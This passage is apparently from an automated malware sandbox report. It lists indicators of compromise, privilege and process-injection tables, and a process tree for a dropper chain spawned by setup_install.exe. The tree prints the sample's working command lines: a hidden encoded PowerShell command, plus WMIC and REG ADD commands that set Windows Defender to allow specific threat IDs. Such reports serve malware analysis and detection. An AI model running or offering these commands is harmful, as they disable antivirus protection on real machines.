19dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4680	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	352	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	510	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1084	Thu0299d0d70a4d322.exe
1084	Thu0299d0d70a4d322.exe
352	powershell.exe
352	powershell.exe
352	powershell.exe
352	powershell.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
5012	WerFault.exe
2108	Process not Found
2108	Process not Found
5012	WerFault.exe
5012	WerFault.exe
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2108	Process not Found
7060	foldershare.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
628	Process not Found

Suspicious behavior: MapViewOfSection 16 IoCs

pid	Process
1084	Thu0299d0d70a4d322.exe
5996	f3TlIoxXFCq8uLyOWNVG6kec.exe
7176	reg.exe
9876	C249.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
4280	gbirrsb
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe
2724	heirrsb

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1324	Thu02c015332704.exe
Token: SeDebugPrivilege	2532	Thu02f60acc90a3.exe
Token: SeDebugPrivilege	352	powershell.exe
Token: SeRestorePrivilege	5012	WerFault.exe
Token: SeBackupPrivilege	5012	WerFault.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeDebugPrivilege	5012	WerFault.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeDebugPrivilege	2104	Thu02588bdad8e7.exe
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeShutdownPrivilege	2108	Process not Found
Token: SeCreatePagefilePrivilege	2108	Process not Found
Token: SeCreateTokenPrivilege	1780	QRApRPI7Ivggnr9ZbkFZa5lY.exe
Token: SeAssignPrimaryTokenPrivilege	1780	QRApRPI7Ivggnr9ZbkFZa5lY.exe
Token: SeLockMemoryPrivilege	1780	QRApRPI7Ivggnr9ZbkFZa5lY.exe
Token: SeIncreaseQuotaPrivilege	1780	QRApRPI7Ivggnr9ZbkFZa5lY.exe
Token: SeMachineAccountPrivilege	1780	QRApRPI7Ivggnr9ZbkFZa5lY.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4804	Riconobbe.exe.com
4804	Riconobbe.exe.com
4804	Riconobbe.exe.com
5008	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
5008	Riconobbe.exe.com
5008	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
3552	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
3552	Riconobbe.exe.com
3552	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
4240	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
4240	Riconobbe.exe.com
4240	Riconobbe.exe.com
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
2108	Process not Found
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
9304	installer.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
2108	Process not Found

Suspicious use of SendNotifyMessage 47 IoCs

pid	Process
4804	Riconobbe.exe.com
4804	Riconobbe.exe.com
4804	Riconobbe.exe.com
5008	Riconobbe.exe.com
5008	Riconobbe.exe.com
5008	Riconobbe.exe.com
3552	Riconobbe.exe.com
3552	Riconobbe.exe.com
3552	Riconobbe.exe.com
4240	Riconobbe.exe.com
4240	Riconobbe.exe.com
4240	Riconobbe.exe.com
2108	Process not Found
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
6988	chrome.exe
2108	Process not Found
2108	Process not Found

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
680	9oJuiCJmKJYZ6vbvI3c0W9cq.exe
2108	Process not Found
9448	MicrosoftEdge.exe
5168	MicrosoftEdgeCP.exe
7016	MicrosoftEdge.exe
9772	MicrosoftEdgeCP.exe
9772	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3908 wrote to memory of 3356	3908	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	76
PID 3908 wrote to memory of 3356	3908	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	76
PID 3908 wrote to memory of 3356	3908	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	76
PID 3356 wrote to memory of 4164	3356	setup_install.exe	79
PID 3356 wrote to memory of 4164	3356	setup_install.exe	79
PID 3356 wrote to memory of 4164	3356	setup_install.exe	79
PID 3356 wrote to memory of 4152	3356	setup_install.exe	80
PID 3356 wrote to memory of 4152	3356	setup_install.exe	80
PID 3356 wrote to memory of 4152	3356	setup_install.exe	80
PID 3356 wrote to memory of 1632	3356	setup_install.exe	81
PID 3356 wrote to memory of 1632	3356	setup_install.exe	81
PID 3356 wrote to memory of 1632	3356	setup_install.exe	81
PID 3356 wrote to memory of 4300	3356	setup_install.exe	82
PID 3356 wrote to memory of 4300	3356	setup_install.exe	82
PID 3356 wrote to memory of 4300	3356	setup_install.exe	82
PID 4152 wrote to memory of 4352	4152	cmd.exe	83
PID 4152 wrote to memory of 4352	4152	cmd.exe	83
PID 4152 wrote to memory of 4352	4152	cmd.exe	83
PID 3356 wrote to memory of 4364	3356	setup_install.exe	84
PID 3356 wrote to memory of 4364	3356	setup_install.exe	84
PID 3356 wrote to memory of 4364	3356	setup_install.exe	84
PID 3356 wrote to memory of 4264	3356	setup_install.exe	85
PID 3356 wrote to memory of 4264	3356	setup_install.exe	85
PID 3356 wrote to memory of 4264	3356	setup_install.exe	85
PID 3356 wrote to memory of 432	3356	setup_install.exe	86
PID 3356 wrote to memory of 432	3356	setup_install.exe	86
PID 3356 wrote to memory of 432	3356	setup_install.exe	86
PID 3356 wrote to memory of 592	3356	setup_install.exe	92
PID 3356 wrote to memory of 592	3356	setup_install.exe	92
PID 3356 wrote to memory of 592	3356	setup_install.exe	92
PID 3356 wrote to memory of 816	3356	setup_install.exe	87
PID 3356 wrote to memory of 816	3356	setup_install.exe	87
PID 3356 wrote to memory of 816	3356	setup_install.exe	87
PID 3356 wrote to memory of 928	3356	setup_install.exe	88
PID 3356 wrote to memory of 928	3356	setup_install.exe	88
PID 3356 wrote to memory of 928	3356	setup_install.exe	88
PID 4164 wrote to memory of 352	4164	cmd.exe	91
PID 4164 wrote to memory of 352	4164	cmd.exe	91
PID 4164 wrote to memory of 352	4164	cmd.exe	91
PID 1632 wrote to memory of 1084	1632	cmd.exe	90
PID 1632 wrote to memory of 1084	1632	cmd.exe	90
PID 1632 wrote to memory of 1084	1632	cmd.exe	90
PID 4364 wrote to memory of 1140	4364	cmd.exe	89
PID 4364 wrote to memory of 1140	4364	cmd.exe	89
PID 4364 wrote to memory of 1140	4364	cmd.exe	89
PID 928 wrote to memory of 1324	928	cmd.exe	96
PID 928 wrote to memory of 1324	928	cmd.exe	96
PID 4352 wrote to memory of 1536	4352	Thu0247e977c7950492a.exe	95
PID 4352 wrote to memory of 1536	4352	Thu0247e977c7950492a.exe	95
PID 4352 wrote to memory of 1536	4352	Thu0247e977c7950492a.exe	95
PID 432 wrote to memory of 1568	432	cmd.exe	93
PID 432 wrote to memory of 1568	432	cmd.exe	93
PID 432 wrote to memory of 1568	432	cmd.exe	93
PID 4300 wrote to memory of 1480	4300	cmd.exe	97
PID 4300 wrote to memory of 1480	4300	cmd.exe	97
PID 4264 wrote to memory of 2104	4264	cmd.exe	98
PID 4264 wrote to memory of 2104	4264	cmd.exe	98
PID 4264 wrote to memory of 2104	4264	cmd.exe	98
PID 816 wrote to memory of 2396	816	cmd.exe	100
PID 816 wrote to memory of 2396	816	cmd.exe	100
PID 816 wrote to memory of 2396	816	cmd.exe	100
PID 592 wrote to memory of 2532	592	cmd.exe	99
PID 592 wrote to memory of 2532	592	cmd.exe	99
PID 2396 wrote to memory of 4704	2396	Thu02bfe1521bcc038.exe	101

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:4888
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:4960
- C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\fENUqIS.exe
  C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\fENUqIS.exe uG /site_id 394347 /S
  2⤵
  - Drops file in System32 directory
  PID:8464
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:8624
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:8920
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:8664
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:6488
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:8104
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9956
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7936
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:8576
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:9384
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9932
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9204
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3508
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        Checks for any installed AV software in registry
        
        PID:9472
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:9904
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:8880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4892
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:9352
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:5960
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6148
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        5⤵
        
        PID:4952
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9352
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:9708
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9984
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:10160
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      4⤵
      PID:9812
  - - C:\Windows\SysWOW64\reg.exe
